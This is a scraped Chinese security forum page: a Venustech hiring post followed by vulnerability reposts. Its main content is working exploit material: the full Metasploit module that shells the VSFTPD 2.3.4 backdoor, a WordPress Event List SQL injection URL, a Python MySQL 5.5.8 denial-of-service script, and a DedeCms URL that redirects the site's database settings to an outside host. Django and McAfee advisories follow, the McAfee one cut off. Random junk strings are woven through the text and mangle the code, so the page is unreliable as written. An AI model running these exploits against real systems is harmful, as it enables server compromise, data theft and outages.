最近看过此主题的会员

返回列表 发帖

[人才招聘] [招聘] 启明星辰研发招聘

  • 招聘职位: 其他职位
  • 公司名称: 启明星辰
  • 工作地点: 北京
  • 专业要求: 其他 
  • 学历要求: 本科
  • 工作经验: 2年以上
  • 职位薪金: 面议
  • 年龄要求: 不限
  • 性别要求: 不限 
  • 公司网址: http://www.venustech.com.cn
  • 简历邮箱: xiaoyan@sitedirsec.com
  • 联系电话: 00000000000
  • 在线QQ:
  • 安全助手: 通过非安全中国管理人员招聘/求职,QQ群:57116771


  • ++++++++++启明星辰相关说明++++++++++

    站内发信给我就行了。
      r- y; |+ K, p$ k7 O' |
    * W9 \6 w. F, p: {( Z# x$ i+ ^

    一、研发中心:Linux C软件工程师(若干)

    岗位职责:

    1.
    & B4 k: _/ N& l+ `1 l- U2 R+ X安全网关,防火墙,IPS等嵌入式设备软件开发,维护

    岗位要求:

    1.
    1 m; b; y% D+ B/ d精通C语言编程

    2.4 B) f' m0 Y; e1 M) h
    熟练使用Linux操作系统,精通 Linux下C语言编程

    3.' _* B2 p$ Y/ W$ k. x7 t$ P
    精通TCP /IP 等网络协议,熟悉应用层协议,及协议分析

    4.* B! l; v4 _0 m" {% P, n- |
    熟悉网络安全协议及路由器、交换机、防火墙等安全设备

    5.
    3 S( r6 E* X6 m+ M1 K  J+ O; v$ W熟悉Linux内核及开发

    二、研发中心:测试工程师(若干)

    岗位职责:

    1.
    $ m# r' U$ m9 Z2 D- a负责产品的系统测试、集成测试工作

    2.
    # a+ I5 J0 C2 C) Z负责产品用例的编写,执行、修改

    3.2 D) n0 s' [& e* I
    负责产品性能的测试

    4.9 i% `5 Y5 [/ \/ n) E
    负责对外项目的支持和测试工作

    岗位要求:

    1.+ g# f) V2 ?+ T9 h0 n* @
    掌握基本的tcp/ip知识

    2.
    ! ?  ?4 }  h+ c& m数通基础好

    3.
    $ I: D0 Y5 `3 w* ]7 x, p对linux有一定的基础

    4.4 }7 {3 v, q4 H1 l; h$ W
    掌握数据库的搭建和使用

    5.0 W* ~$ }/ k1 g- |- f" ?$ l/ Y
    至少熟悉一种编程语言C/Perl/VBS/TCL

    6.4 f6 Z& D/ i2 q( w. g5 Q, G- i
    熟悉测试用例设计,熟悉系统测试,熟悉压力测试

    7.4 S" ?! u* u7 X: w+ K  z
    熟悉防火墙相关原理,对于防火墙的一些功能特性有一定的了解

    8.. |/ @; n: R6 D3 b2 c5 w5 H5 w
    对网络安全设备在网络中的部署有一定的认识

    9.
    - v/ v# n( `0 V1 i掌握测试工具的使用:Loadrunner、包分析软件、思博伦或IXIA的测试仪

    三、研发中心:安全事件工程师(若干)

    岗位职责:              

    1.5 r/ u! i' ]7 i
    木&马检测服务、WEB漏洞扫描服务的实施

    2.5 W! g- M- K' G7 D1 P. O
    对服务客户的技术支持

    3.
    3 N  g3 p+ Y: V0 V, `8 W
    对于网页木&马,WEB漏洞、蠕虫、扫描、拒绝服务、缓冲溢出等的研究

    4.
    / k" i  V6 V) C+ }: D0 }
    对IDS/IPS/UTM/TDS/WAG/322等产品的安全事件库进行日常升级和维护

    5.0 p/ X: p$ L$ _3 B# ]
    对各种攻击手段的研究;TCP/IP协议的研究;逆向工程的研究

     

    您可能还想看的主题:

    启明星辰招聘

    非安全中国网免责声明 1、本帖所有言论和图片纯属发表者个人意见,与本站立场无关;
    2、本话题由:小妍发表,本帖发表者小妍符合《关于版权及免责声明》6大管理制度规定,享有相关权利;
    3、其他单位或个人使用、转载或引用本帖时必须征得发表者小妍和本站的同意;
    4、本帖作品部分转载自其它媒体并在本站发布,转载的目的在于传递更多信息,并不代表本站赞同其观点和对其真实性负责;
    5、本帖如有侵犯到贵站或个人版权问题,请立即告知本站,本站将及时予与删除,并致以最深的歉意;
    6、本站管理员和版主有权不事先通知发帖者而删除本文。
    收藏 分享

    VSFTPD v2.3.4 Backdoor 命令执行漏洞
    ################################################# $Id: vsftpd_234_backdoor.rb 13099 2011-07-05 05:20:47Z hdm $    ## This file is part of the Metasploit Framework and may be subject to      ## redistribution and commercial restrictions. Please see the Metasploit     ## Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/                                                    #################################################% k4 R* u- s3 K

    ' R' ^8 p4 _% G" Y% J7 @- x1 V" z+ a
    5 o1 k* H. T; u  l6 E; o& e+ I, A) S
    require msf/core: x4 K4 j8 p3 f3 \0 d% j9 h- w
    4 |) P' B1 d; L% Y# o" N: N
    class Metasploit3 < Msf::Exploit::Remote8 Z$ h3 C' _  N- s6 U: E- Y, j. n/ N! ~
    Rank = ExcellentRanking
    5 c) |: x9 W/ x* E: s6 ?2 w! J! i4 h7 n# w0 A
    include Msf::Exploit::Remote::Tcp
    9 }! ]" h$ }8 W0 Y. e( r1 ^; L
    . X( x( |( D9 j: l& zdef initialize(info = {})0 y1 ^; x6 l) N. R+ j- G+ I3 X- E
    super(update_info(info3 n& J! Y6 F/ O2 y+ \
    Name => VSFTPD v2.3.4 Backdoor Command Execution& N& d' L: S7 Y6 ~& ^5 v1 z3 G3 z
    Descript_ion => %q{
    ( {& P  l0 T* I$ m! c  vThis module exploits a malicious backdoor that was added to the VSFTPD download% Z2 C/ O. m% v9 M/ m" n9 {% h
    archive. This backdoor was introdcued into the vsftpd-2.3.4.tar.gz archive between
    " d0 D: x& C+ K; {; H4 G: MJune 30th 2011 and July 1st 2011 according to the most recent information2 f" x' G6 D: E
    available. This backdoor was removed on July 3rd 2011.% W( Y% S7 s2 i0 r, T" j7 H% N
    }* r: u: O* s  `* b8 f
    Author => [ hdm mc ]
    ' `5 y. k8 H" h/ p" DLicense => MSF_LICENSE
    # g. W* U' ]+ E) I7 u0 j  cVersion => $Revision: 13099 $
    - r1 t5 K* `/ G. D! jReferences =>
    % E1 b7 [* P( J- A$ g9 j[, T+ M" t, x+ u2 M, G* k6 J  U
    [ URL http://pastebin.com/AetT9sS5]# d' E2 O2 [4 `' v' W
    [ URL http://scarybeastsecurity.blogspot.com/2011/07/_(使用时去掉_)alert-vsftpd-download-backdoored.html ]
    8 K0 e9 Z+ T3 Q  U4 P4 w+ j$ }]
    ( \! W% {# ^- k8 ?; kPrivileged => true
    : {: W$ y) J: Q; |2 u2 ?4 X$ A; xPlatform => [ unix ]( ~$ y" W8 o+ o
    Arch => ARCH_CMD8 Z$ K% I. Y/ ]( S
    Payload =>
    9 Y) ~. o. O3 r3 r{
    0 F# H9 V# e) @; Q( WSpace => 2000; w; e: z/ ]9 v
    BadChars =>
    . _& i! u8 \" e2 eDisableNops => true9 b$ O9 q  A; t/ A; K
    Compat =>
    & [+ S" q  Y' {( c{
    ! g/ G- Q; q% z: H; w/ \" nPayloadType => cmd_interact
    # u: T9 {3 v: ~6 o  BConnectionType => find$ r* ]" \% W" p
    }
    ( a3 _* ]" |. t& |9 \$ L}/ Y/ E4 n/ A8 R; C
    Targets =>
    # v- D+ G  @* Q7 F% {+ S5 X[% O9 _. h" C4 m
    [ Automatic { } ]
    , r& N8 \2 ?- ^6 l" f8 V2 m' g! @6 t8 v]9 d* A4 g  l" m# S$ N
    DisclosureDate => Jul 3 2011: R! V7 K2 ~5 G" ?0 p, C: N
    DefaultTarget => 0))
    * L. b) m* w- Z3 y# ^' g2 g; A( i3 j, J: Y
    register_options([ Opt::RPORT(21) ] self.class)
    ) m! B2 o$ |6 Q3 O/ ~1 C; r( ^/ `end) x# ~: ~4 D  R

    - J. N$ S, B) o6 o# I; ]6 Ydef exploit' y3 G' ^& Z2 r) y, U2 f

    6 w0 l' t1 q, R1 \  ?& W  C! m1 Jnsock = self.connect(false {RPORT => 6200}) rescue nil$ V$ t9 Q! T+ d. q
    if nsock" C' D9 z8 p3 y. M8 O1 O
    print_status(The port used by the backdoor bind listener is already open)
    - i9 `8 R0 S# ^2 s4 c: Fhandle_backdoor(nsock)2 z1 T+ }) }6 x) ?
    return
    % L8 {  f- V1 I; W! O, s1 yend: C9 `; C2 U+ v" @( C! V& I8 N
    - W  Z6 R# N( [
    # Connect to the FTP service port first$ ?7 v% A( m0 }6 v; I
    connect
    ) e- n$ t, v% A7 _, w/ T5 }" T% |
    7 e- r0 H! a" F8 L5 C! t, p1 a' T' e. c/ Nbanner = sock.get_once(-1 30).to_s
    7 }% ]. t! v) u7 d8 z& F4 m2 Fprint_status(Banner: #{banner.strip})
    8 E: G4 w( H, U$ d( a4 J
    ! ?- ?4 i0 e3 O  Y" x3 asock.put(USER #{rand_text_alphanumeric(rand(6)+1)}:)* Z. O6 W% q% z) V* e  x
    )( O, h- ]2 u  L9 A2 `
    resp = sock.get_once(-1 30).to_s$ ?; I; ~9 A7 W5 e5 u+ H' m
    print_status(USER: #{resp.strip})$ }' D8 p8 k4 {2 S

    3 j( _4 @7 c. kif resp =~ /^530 /
    8 p! U3 w, r8 D: S  kprint_error(This server is configured for anonymous only and the backdoor code cannot be reached)) p2 L" R* p6 x9 V* n( j4 L
    disconnect3 H0 S# o1 d  f& h
    return
    & T$ I! G) U8 |  _end
    / U, A2 h- v% |6 P+ f4 V6 t8 W8 r3 x# `+ f
    if resp !~ /^331 /
    $ ?5 a! u( A' q4 N; Wprint_error(This server did not respond as expected: #{resp.strip})
    : r+ s5 U7 l3 T' D' F) |7 q% `disconnect" O. M. w4 Z7 W8 ^/ x: c
    return
    * v: t, j) n4 B8 E/ ~end4 ^9 W/ I( Q3 M( G  x: z
    % V7 a8 D# p: _1 `- K  a0 ]3 _
    sock.put(PASS #{rand_text_alphanumeric(rand(6)+1)}
    % q7 a1 m8 H( g' T  W' {1 ]! \)
    3 H) |9 S1 T% N( G" ~3 K  @/ W8 S2 a: {! G
    # Do not bother reading the response from password just try the backdoor
    ! X7 m6 D: e$ H/ W3 P# K' R: insock = self.connect(false {RPORT => 6200}) rescue nil$ y4 o. \, J: R" j+ `- P
    if nsock
    5 ?# q. {$ [. Oprint_good(Backdoor service has been spawned handling...)# |, p9 ]: ?* R5 o& D4 A. \2 D! v
    handle_backdoor(nsock)8 i; P' U" O& N5 T! j
    return
    ! Y/ A* ~+ N- r2 V, j) F9 b$ u- ?end2 }4 ?! A, K* {

    & ~# K- V! x/ ?% A4 ]/ b3 Pdisconnect& c. Z* ?0 V) w
    + {5 Q! N$ ]4 n# j1 H
    end
    ; c8 g% s( c( m; g+ R  g5 f1 V) `1 J6 j. a+ O
    def handle_backdoor(s)# ]. x. @; O4 h. I0 g
      z! S2 d, v9 s* s0 [; P7 a) M
    s.put(id% k; z; M8 ]# M4 G
    )
    " u  L% Y  g2 x' A; h4 Y
    ' A6 v& x5 l9 y: @1 i, h% J2 K# z' f8 rr = s.get_once(-1 5).to_s  x5 q5 I6 G9 m  [7 _
    if r !~ /uid=/
    ' B: `' M0 }" T5 n  P* \print_error(The service on port 6200 does not appear to be a shell)
    + s6 |, T, d& }( U5 jdisconnect(s)5 m$ \# ?; E; \- d% O  K
    return
    . a# ^2 s, k) F! e8 g9 `" V8 send' ?3 r6 w! Z+ r
    # [+ l) F& X0 [. r2 l; r
    print_good(UID: #{r.strip})  [4 q5 L2 l  ^* I

    9 C* L# Q. ]4 l5 o( ?$ es.put(nohup  + payload.encoded +  >/dev/null 2>&amp;1)
    ' @$ H3 s6 w: G9 ?- P: fhandler(s)
    1 q8 t" V# S9 x" j$ A) Pend
    / t4 A2 \0 Z/ k* ^) {! H( h2 h2 X% w" N4 X; {
    end复制代码
    * b6 f1 G9 O& I0 h# E1 Q3 }7 Q' W  s% i8 g: i5 H7 m
    3 F6 d. W# f& Y* |
    ! r4 ]( `9 K3 ]# K$ Z$ }0 E) v& ^
    % X/ h) w% X! T/ U

    6 F7 Y3 W" V! o( I
    - R+ H% }2 U1 l. z, _
    & l1 b" E3 X0 n$ a: m4 M) C, d6 X3 Z. {( @# @" w9 x

    4 C5 A% w6 Y$ w2 d* a: O$ [) R: M* Q. H, x8 A2 I) X) O

    % H9 Q  r0 E1 |/ ~7 r0 {0 s% a
    ! q& _7 o- |2 w  G" O$ i
    ) A  N- Q5 n& W% v& q! }+ z$ i, E' i/ A% F. L: A3 m! l0 V
    0 }" W. a' I: W, t* ]

    3 \7 o1 w$ j1 J) H
    5 D' F8 f; Z; K5 L
    : g1 U" T" b0 Q9 p公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    WordPress Event List Plugin <= 0.7.8 - SQL 注入漏洞
    1. Description:5 E# {4 ^' s4 D" _: C
      , ?1 b. k, P( R# D! R
         
    1 h9 V3 a& Y. n% l4 \0 E3 ]5 @  
    % \  C* y! H) }4 z6 nSQL injection vulnerability in the Event List plugin 0.7.8 for WordPress
      l- i( ~7 C7 ]" d0 w0 O" z. Wallows an authenticated user to execute arbitrary SQL commands via the id1 y6 {: X0 e  Z* V
    parameter to wp-admin/admin.php.
    . T3 z* |: s" w. \# v+ V" t6 y  $ v# i5 T8 k/ S' G
       
    8 P" }$ E; l* h  
    $ y* m2 t5 q; x# h0 y" s2. Proof of Concept:
    / y2 P3 @# ?( z$ o  
    8 j' U  i; x" |7 H$ v   8 r* N, g& k, E: G: H" |7 c
      
    " P( p2 S0 {4 Qhttp://[wordpress_site]/wp-admin/admin.php?page=el_admin_main&amp;action=edit&amp;id* e: N# N& Y1 E: z3 x, r
    =1 AND SLEEP(10)2 N+ |1 z1 g% E0 r

    ' @) d  _3 C1 }- b" {. C- ^  ! C/ z' N/ D# _
       
    ; S9 I) T* Q9 f, S4 q! K- x1 P  : r- S) \( G4 H6 J2 n  i) ^4 y: J
    3. Solution:( i' `" N" S1 e" a( I
      
    # \/ o" \5 m% I5 j8 z     
    - O4 i2 q. O9 z4 a( @  / o- S8 Q; \* g' }# q! w
    The plugin has been removed from WordPress. Deactivate the plug-in and wait
    , j5 ~& g  H4 X) y# bfor a hotfix.
    5 D; B# s0 X8 P9 v! ?. d  ( w8 n0 A) u* A* g- Y& H1 s$ X
       
      R, i2 p4 I& L" h  : e) \- D% I$ p1 V" }7 t8 S
    4. Reference:
    % N8 E4 ~, O& h) _: k  
    " o8 U. u: o) c: G' m   
    8 Z6 r# v5 K8 y& F, c  
    , a+ `; d& N  Q4 A$ ehttp://dtsa.eu/cve-2017-9429-event-list-version-v-0-7-8-blind-based-sql-inje
    , a/ A  z$ X; Y# S9 f3 Fction-sqli/7 J9 t/ J& A( E" ~* O; J
      
    : ~0 b0 z9 q" @" @http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2017-9429
    # s0 @+ k2 u* b0 D+ C; Q6 f+ y) M  z- [
    ; c, A2 x" @- B& q, b; u
    " ^' G5 y# }; {5 b/ x. j
    2 v# {! c" W0 o$ e2 F' P4 T
    + u+ r" g( F0 L5 b

    & o! D; C/ q4 y' U1 M& {8 a
    & O1 O) k6 J: Q8 F8 p& K% D6 ^( x* J3 X6 p
    4 p  m' F0 t5 S( Q; a( S, g  s" C
    & w  [5 ^" C' G, Z" @2 V

    ) d- |! A7 u  r# b
    5 n* A# L4 ~/ W2 q" o  h' M0 n' M# c8 A2 h8 ]' M

    1 p' m) M. X4 x  f" V1 A) g
    ! x  s: L. H$ s- C# m7 w- f# m2 ~
    9 W6 c2 C% f- ]3 z' d
    ) Z$ j* d/ U4 D7 k, `* V7 E7 P7 k& c( `% k
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    MySQL 5.5.8 远程拒绝服务漏洞
    import socket, sys6 B3 N6 H5 Z  {* x4 P$ X! D

    " \. @1 u4 T- |- rprint "" T3 b/ F, r. |, E: `
    "4 T: |8 a, G& X. x
    print "----------------------------------------------------------------"& [0 a6 w8 a7 h; O% Q1 D. q. k- x
    print "| MySQL 5.5.8 Null Ptr (windows)                                |"! j# }8 ~) [/ o# F4 B
    print "| Level Smash the Stack                                         |"; ~$ {( [2 @% t
    print "----------------------------------------------------------------"
    / s- ~& I* g+ H! N; lprint "4 ?  A9 V+ y& p" m
    "
    1 p& p  ~3 A2 T
    ) }+ W; j, [  |4 w) v* |6 J$ Hbuf=("&amp;x00x00x01x85xa2x03x00x00x00x00@x93x00x00x00x00x00x00x00x00"
    ! f) p1 Y9 N9 {% f& [8 y& N"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00rootx00x00")1 ?4 \7 c. Y3 A
    2 F5 s' \! i6 g7 k+ F3 f
    buf2=("x11x00x00x00x03set autocommit30")
    4 I' L8 J8 A- r) k, a
    4 U7 A' @  b$ N2 Zdef usage():1 o$ u& n+ v1 C( W. W5 \: E# b
    print "usage : ./mysql.py <victim_ip>". z7 c% X" y# A/ M- Y$ m
    print "example: ./mysql.py 192.168.1.22"8 F$ g9 ~! y8 F; r

    , K. Z( E$ B/ N6 r3 s2 m 6 y! k' h" V5 Q5 v" X* \4 S, x
    def main():
    ( R6 H+ n5 }$ t; `. s" Iif len(sys.argv) != 2:; n0 n1 ^- f" [' E
    usage()4 C: L& j+ n" U' {0 \; ~6 G
    sys.exit()9 b" b# K7 @. h. `* a% I8 B; P
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    + h* Y1 z* r2 |$ n 2 m. g+ d4 |1 o9 H/ ^3 g- C
    HOST = sys.argv[1]
    - W' ^: R5 m" E# |6 nPORT = int(3306)8 L) f/ ^0 a# Z5 u
    s.connect((HOST,PORT))
    4 {* t6 ^6 k; D. }6 B* }% Q4 tprint "
  • Connect"
    7 `( H2 @! r' F/ Ms.send(buf)8 C' ?8 G) h8 m4 r) B1 n
    print "
  • Payload 1 sent"
    5 m( h. m& f# D& E; v+ Hs.send(buf2)' _, |3 Z; n( _+ l; k+ q9 m
    print "
  • Payload 2 sent4 @+ q, G! e. @1 o4 Z8 O
    ", "
  • Run again to ensure it is down..# k7 O: i* O! |! X6 R1 V) [) o
    "
    3 o/ T9 y* P; Z  @, m) b, ~0 Ts.close()/ s" H- s7 c/ n: [; K: y* t

    1 C. d" D# t6 x( r6 bif __name__ == "__main__":3 H0 W; k( j/ z$ x9 P+ Q
    main()! J9 a, C& D% U8 N

    6 y1 V3 w; c$ N2 x; v% e2 G8 E: K: A3 E$ B* Q& \$ z! j( G" H  X7 U
    ; j0 g7 N3 }: B8 l
    1 z5 p: C) l* o/ _, V; b, g
    & W7 d" o7 U$ d" V1 Q$ f

    ! ?4 I7 X9 Z" i4 c
    1 p  \, j- K1 Y; \6 H& U$ X0 Y* B7 Z3 k9 E
      ~- m7 {- P3 {1 Q
    ' a$ [; O1 }! w# f2 O
    2 a$ `4 X1 R6 }9 M8 D
    3 T* V3 r  b( p

    & g- z! A" ^0 n! k* T& t  Q. V
    : R+ p. r/ `2 K
    9 t0 H7 \/ W5 C' R; `  `
    7 ^+ Q- I9 K% U- A: N
    , }# _7 K& a' q0 s# ?  d  \5 ]' e+ P( P2 m# J, Q" H
    公告:https://www.sitedirsec.com公布最新漏洞,请关注
  • TOP

    手把手教你装Linux系统-设置虚拟机
    ( A! n$ G! s. b0 G: n8 T) C
    http://www.sitedir.com.cn/video/4.swf
    5 k. H4 ~" Q! v6 _4 t/ n& f. C
    : e" }( I' s' _" E
    * M  Q2 Y  s' @9 G' P8 b
    3 p6 ]) ]5 S6 p; a4 W5 G
    4 ~/ [- T: d3 {8 {" V5 @6 M: |" g* i/ \! M! y

    6 r2 g; O+ ^  u/ y
    0 T9 a/ ?  v( ~' `6 }& k
    4 s0 W0 z# Y/ Z# J4 f1 P" S: _8 s; r3 a9 W$ C. O
    7 d6 s/ x6 P- @# H; P1 f

    / c* H0 |8 O; ?$ D/ c' ~1 e  S/ @5 B4 p. c  g/ Q+ W
    4 k6 w# U: n( n) Y% D+ @' k; ^
    3 L6 V+ `2 l0 ]& \
    ) o. }- \# ?1 K, j, p% v" `' H

    ; P; n/ a1 ~/ i* f6 J
    % @) c: S+ r' G. D9 q  {+ W+ e1 k9 A) u* e, N
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    织梦(DedeCms) v5.6-5.7 越权访问漏洞
    http://www.XXXX.com/织梦网站后台/login.php?dopost=login&amp;validate=dcug&amp;userid=admin&amp;pwd=inimda&amp;_POST[GLOBALS][cfg_dbhost]=116.255.183.90&amp;_POST[GLOBALS][cfg_dbuser]=root&amp;_POST[GLOBALS][cfg_dbpwd]=r0t0&amp;_POST[GLOBALS][cfg_dbname]=root

    5 M+ S' X, F, L9 h4 e% v, J" Z
    把上面validate=dcug改为当前的验证码,即可直接进入网站后台

    ' [$ ?9 l$ c  |
    此漏洞的前提是必须得到后台路径才能实现

    1 H5 |7 q4 z$ C9 a
    官方临时解决办法:

    3 e  X3 b7 W& [' d: s
    找到include/common.inc.php文件,把:
    8 m( s# V7 }' y& r! U0 Y/ r9 p9 r
        foreach($_REQUEST as $_k=>$_v)
    2 z4 B* @) {4 b+ A- D4 X! j* `    {
    , _5 \/ w5 J" _) X! f        var_dump($_k);9 Y8 o* U4 L, t* k
            if( strlen($_k)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$_k) )
    ' |; B/ c  z1 `8 h" ^  s7 H5 U; j! j3 q        {
    $ x+ i+ e$ s7 B            exit('Request var not allow!');1 h$ f4 e$ f0 t: ^+ @9 s
            }& Q6 O# W1 R6 W
        }

    ) x1 U9 [2 A8 e# u
    换成:

    * t& D5 }0 z. h" s1 s. I& n$ {$ Y3 f: Y
        //检查和注册外部提交的变量1 O( H  Y7 {+ ^3 U: ?
        function CheckRequest(&amp;$val) {
    ) e$ b4 D* y- [, x        if (is_array($val)) {( o4 k# d2 e' \& [* u' s0 C
                foreach ($val as $_k=>$_v) {8 u& `7 T& U8 u) s
                    CheckRequest($_k);
    ; \7 r! ^" W) v$ e- K# I; j8 f                CheckRequest($val[$_k]);9 K  a. X$ i. C2 Z) P, {
                }
    ; g  w: u+ t" A/ X        } else( ~& T0 P5 F; F# R
            {. Q, w% B# Q  S! Z# L" A( x
                if( strlen($val)>0 &amp;&amp; preg_match('#^(cfg_|GLOBALS)#',$val) )* {+ m" L2 n0 r6 l; x
                {
    4 E+ _: n1 v& W7 ?* _7 |                exit('Request var not allow!');
    1 }; D, ]' K2 A( S& v            }
    % }! P' c; J6 d1 @; [) T        }6 w2 d& G6 Z. ]. @, n
        }9 m* m+ Y( I, {; F, b$ a* P
        CheckRequest($_REQUEST);. F: ^  ~5 k' Y$ j5 d
    # a6 O2 ?1 C; a: v

    , B: t9 q$ W9 O. a) l* k9 z1 Y; t" p) \. X+ o* k7 C

    / ]6 G$ {. b( b& |) f$ s3 M9 h- s2 m. f8 P
    - p# \( f( ?- K* ]" b( b1 Q

    , p6 `9 }$ n$ v; ^) M# y
    4 F) d0 e! |. i" J# ]4 |- C  z) N8 t8 [6 Z' R& Q
    . M, q7 O; G% V* j2 O
    # l" \/ P3 X/ v/ \. y& b
      n9 ~5 M* ?& W) ]$ s- V" {" s! Y! y, D+ A

    ' f& p8 S7 {# r! F" h& ]3 f0 r+ B. _. M: h, I) I0 u6 c- K. X

    ( ?4 V" Q. ]( F$ ^) |6 u5 C+ f/ K* Y1 ~( v& e: D- j

    , j( M4 x# ~4 ~
    ; @. _  G0 j( Y6 H! p) e* ~4 N( V* z
    , T. G' h" ]4 \7 ^/ I6 X1 u/ k公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    手把手教你装Linux系统-设置虚拟机工具
    <P align=center>- @: l1 Z% ^0 v$ u* A; O/ n+ M

    ( ^' E% Z/ W) ~" {) U: Phttp://www.sitedir.com.cn/video/8.swf[/quote]" [0 ~7 y- v( C9 \- g
    % j5 I6 w. R( B7 d8 b

    7 }/ \% H" W  n: I6 n) H/ p
    ) L2 l  ^% l" i6 R7 J  F' W
    " p  S, ^: |# A2 z3 C, ?
    + g) [# G3 _$ `) v# K; s" ]
    ; X  Q) B4 L) U( @2 V8 I2 ]# B8 A% G" X' o7 f
    6 }2 w+ V) K5 i& c2 G) D; r& z
    $ E8 l  I2 s; Z) ]" z5 a

    ; ?$ Y# m+ M, d1 \" ]# Q$ v$ _
    $ s- s, p* q3 i6 s; w4 ]& Q! h( n) Z) I) [9 P

    9 D1 v2 {. f0 i6 A3 a7 |! Z5 Q. P9 Y8 \! i3 W. o1 K

    , n7 f, q+ y( a5 v. m$ G  M
    % U. }. o5 t: F
    1 s' P0 D. P, [9 O: O& _/ ~7 z! q- b  B. e! {4 R# v! T
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    Django开发框架多个安全漏洞
    发布时间: 2011-09-12
    3 w' \* v0 W0 [4 d
    影响版本:
    . c- w: _& R; VDjango 1.2.5
    # N; [5 e. w1 N. U$ QDjango 1.3 beta 13 X7 i( I; x" ~4 W& r0 w
    Django 1.2.4
    8 d/ m+ {7 f$ B. A. n+ FDjango 1.2.2
    2 q3 V, j  b- P2 vDjango 1.2
    & }: t! ]% V) u0 V/ Q) [; z
    漏洞描述:

    $ f. ^% y; p  f' b4 X( A7 ?% ?
    Django是一款开放源代码的Web应用框架,由Python写成。
    ; C6 c3 K9 e' f1 h; k* C1 qDjango存在多个安全漏洞,允许攻击者获得敏感信息,操作数据,进行缓存毒药攻击或进行拒绝服务攻击。+ I% F: w8 ~9 a) z
    1)当使用缓存后端时django.contrib.sessions中处理会话存在错误,可被利用操作会话信息。要成功个利用漏洞需要已知会话KEY和应用程序允许攻击者使用合法会话KEY储存字典类对象到缓冲中。. y0 ?+ _6 C6 U: ^6 x- _
    2)Django模型系统包括一个字段类型-- URLField --,用于校验提供的值是否为合法URL,如果布尔关键字参数verify_exists为真,会尝试校验提供的URL并解析。默认情况下,底层套接字没有超时设置,攻击者可以利用此漏洞发送特制URL消耗所有服务器内存,造成拒绝服务攻击。  |4 s* t4 j" v
    3)当校验提供给"URLField"字段类型的URLs处理重定向应答存在错误,攻击者可以利用此漏洞把重定向应答返回给"file://" URL,可判断服务器上的本地文件是否存在。/ r& z9 t) K* `8 d) J; @( ?8 C! G
    4)当生成重定向应答的全路径URL时处理"X-Forwarded-Host" HTTP头存在错误,攻击者可以利用此漏洞进行缓存毒药攻击。
    & Y$ e  J; f# L
    细节参考:
    : S6 v) P8 H* b( C, y& h/ Fhttps://www.djangoproject.com/weblog/2011/sep/09/security-releases-issued/
    + h+ O+ X5 w7 B6 `9 W5 N8 R8 s2 Lhttp://secunia.com/advisories/45939/

    ; h' @  x& H' ^& P

    3 M5 I  n  H& l( {. ~
    5 U2 `, K+ V/ p9 d+ T
    % I3 _- y/ S7 n: U7 T( d: Z2 d6 j. w
    1 b* d: H0 ]6 e' j( ^) ^
    ; k2 d+ C% ~' I* j0 _" P) G7 W6 s2 C! ^
    ) u  t, d! ~6 A. z3 ~% ^( k% U

    0 K" T+ r, E& O- H
    ' N3 u' y# B+ Z: c; a* S/ t$ X5 r; N* g6 b& T2 z

    ' c" O$ N# Y/ Q) W2 V
    0 @3 h3 ]  q5 A8 P, i& T: K9 ~4 A3 x  n
      h' L6 J* ?2 P8 U: ~( S
    / H" v* G& C3 o+ ?: O! N- v

    & }! U& }" o% J5 J' @
    / C, ^$ S) c3 X% d3 X1 u& P# H/ |' h
    3 h' U% U3 b$ f: O- U+ z) {; J! Z* M
    公告:https://www.sitedirsec.com公布最新漏洞,请关注

    TOP

    McAfee LinuxShield 本地/远程代码执行漏洞
    McAfee LinuxShield remote/local code
    9 \- I! g$ `) [7 x% O7 G影响版本: McAfee LinuxShield <= 1.5.1# W1 B7 D- f3 }) o7 b
    远程攻击: Yes
    & O  H% u# I! U( L本地溢出: Yes
    # p3 A; g4 {8 X( p0 j7 \# i) `背景阅读:" n' s- {+ r: `
    ===========4 F% |2 L6 a; z5 Y6 N

    $ \% ]$ |4 m8 jLinuxShield detects and removes viruses and other potentially unwanted, z+ ?& @2 O/ x/ E. x7 O) \
    software on Linux-based systems. LinuxShield uses the powerful McAfee8 R& k3 |1 t' A# z' w3 y" ~/ H! k6 l
    scanning engine ?&amp;#65533;&amp;#65533; the engine common to all our+ B% D; }" h& x& H# \$ Q% A
    anti-virus products.
    " J0 ^, Q2 f6 {. R4 ]" ]' c5 u5 C
    Although a few years ago, the Linux operating system was considered a# m" ]/ q3 _  q8 V( Q" H9 j' S- Z
    secure environment, it is now seeing more occurrences of software
    ; L4 r) G6 U# Y5 Vspecifically written to attack or exploit security weaknesses in
    $ R3 ^4 I# n5 T( s( U& s1 v2 U) xLinux-based systems. Increasingly, Linux-based systems interact with# S* O$ m% u1 Q! k4 U) D9 n  w' A
    Windows-based computers. Although viruses written to attack Windows-4 K0 z3 o; Q9 y* a  i7 O
    based systems do not directly attack Linux systems, a Linux server4 u: i0 O$ h$ S& E% _7 c6 N2 N
    can harbor these viruses, ready to infect any client that connects to* X* L7 y, l6 k% B' P
    it.$ X: I) J& Y# |+ f3 j
    , k2 o+ D* k( ^) ?' y
    When installed on your Linux systems, LinuxShield provides protection
    6 L1 [5 k2 _$ d: x/ Aagainst viruses, Trojan horses, and other types of potentially
    + a  N1 s7 E* E7 [+ c' ?" Vunwanted software.
    3 k2 m7 g- b0 c0 [3 E- U0 K1 z0 u
    7 O8 r( g3 m) p9 @4 i6 ~LinuxShield scans files as they are opened and closed
    8 u$ _1 r# D9 V6 P?&amp;#65533;&amp;#65533; a technique& `5 b$ E1 m' _0 s+ X
    known as on-access scanning. LinuxShield also incorporates an
    # j2 `* `( I) I1 l* }on-demand scanner that enables you to scan any directory or file in& b9 k# {: s  n
    your host at any time.. p. a0 Z: l1 ^$ J- H9 E
    ; {$ U5 y4 a4 y" T1 e0 b
    When kept up-to-date with the latest virus-definition (DAT) files,
    : Q' ?4 Z( D, O; h- vLinuxShield is an important part of your network security. We
    8 S7 P: v, P0 G/ ?) H! Y  ~recommend that you set up an anti-virus security policy for your( c# [/ L' h& y, Z; j/ h6 i
    network, incorporating as many protective measures as possible.
    2 `# w4 x; ^7 J, {
